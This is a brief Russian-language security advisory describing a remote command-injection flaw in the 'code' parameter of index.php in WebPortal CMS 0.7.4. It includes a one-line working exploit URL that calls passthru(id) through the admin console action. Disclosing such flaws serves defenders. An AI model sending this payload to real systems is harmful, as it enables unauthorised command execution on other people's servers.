Программа: WebPortal CMS 0.7.4

Уязвимость позволяет удаленному пользователю выполнить произвольные команды
на целевой системе. Уязвимость существует из-за недостаточной обработки входных
данных в параметре «code» сценарием index.php. Удаленный пользователь может
выполнить произвольные команды на целевой системе.

Эксплоит:

/index.php?m=admin&f=console&action=execute&code=(id);} passthru(id);



Оставить мнение